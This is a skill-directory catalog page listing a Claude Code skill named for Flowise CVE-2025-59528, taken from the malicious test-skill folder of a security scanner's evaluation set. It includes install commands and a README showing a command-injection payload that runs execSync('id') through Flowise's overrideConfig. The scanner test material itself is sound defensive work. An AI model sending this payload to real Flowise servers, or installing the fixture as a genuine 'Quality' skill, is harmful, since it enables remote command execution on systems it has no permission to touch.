🛡️
QualityPython

Flowise CVE-2025-59528

by cisco-ai-defense

Flowise CVE-2025-59528 is a Quality skill for Claude Code, published by cisco-ai-defense in skill-scanner.

2.4K stars308 forkson cisco-ai-defense/skill-scannerAdded 2026/08/18+1% in starsRepository updated 2026/08/04
agentagent-skillssecurity
Install in seconds
Install Flowise CVE-2025-59528
Copy Flowise CVE-2025-59528 into your Claude Code skills folder. Run the command in your terminal, or review the source on GitHub before installing.
terminal
npx degit https://github.com/cisco-ai-defense/skill-scanner/tree/main/evals/test_skills/malicious/flowise-cve-2025-59528 ~/.claude/skills/flowise-cve-2025-59528

Requires Node.js. Downloads this skill only — not the rest of the repository — into your Claude Code skills folder.

Without Node.js

git clone https://github.com/cisco-ai-defense/skill-scanner.git

Clones the whole repository, then copy the skill’s own directory into your skills folder yourself.

In this catalog

Source file
evals/test_skills/malicious/flowise-cve-2025-59528/SKILL.md in cisco-ai-defense/skill-scanner
Installs to
~/.claude/skills/flowise-cve-2025-59528
Collection
One of 21 skills cataloged from this repository
Category
Quality1354 skills

What Flowise CVE-2025-59528 does

Flowise CVE-2025-59528 sends a crafted request to a Flowise chatflow API endpoint to detect the overrideConfig command injection vulnerability (CVE-2025-59528).

Flowise CVE-2025-59528 is cataloged under Quality on DirSkills. Flowise CVE-2025-59528 comes from a repository tagged agent, agent-skills and security.

Documentation

README

flowise-chatflow-api

Exposes Flowise chatflow API with overrideConfig support.

{
  "overrideConfig": {
    "javascriptFunction": "return require(\"child_process\").execSync(\"id\").toString()"
  }
}

Fires: ATR_2026_00210 (CRITICAL) — CVE-2025-59528

Frequently asked about Flowise CVE-2025-59528

  • What else does cisco-ai-defense publish alongside Flowise CVE-2025-59528?

    Flowise CVE-2025-59528 is one of 21 skills that DirSkills catalogs from cisco-ai-defense/skill-scanner, the repository it ships in. Its siblings there include ATR Benign Control, Calendar Sync Helper and Configuration Analyzer. Each one is a separate skill with its own page in this directory, installs the same way Flowise CVE-2025-59528 does, and is maintained by cisco-ai-defense in that same repository. The rest of the collection is listed on the cisco-ai-defense/skill-scanner page.

  • How does Flowise CVE-2025-59528 compare to other Quality skills?

    Flowise CVE-2025-59528 ranks #509 by stars among the 1354 Quality skills in this catalog. The most-starred ones next to it are Benchmark, Benchmark Optimization Loop and API Design Patterns. DirSkills ranks by the star count of the repository each skill ships in, so that order reflects how popular those repositories are rather than any review of Flowise CVE-2025-59528 against them. Open each page to compare what they document and how they install.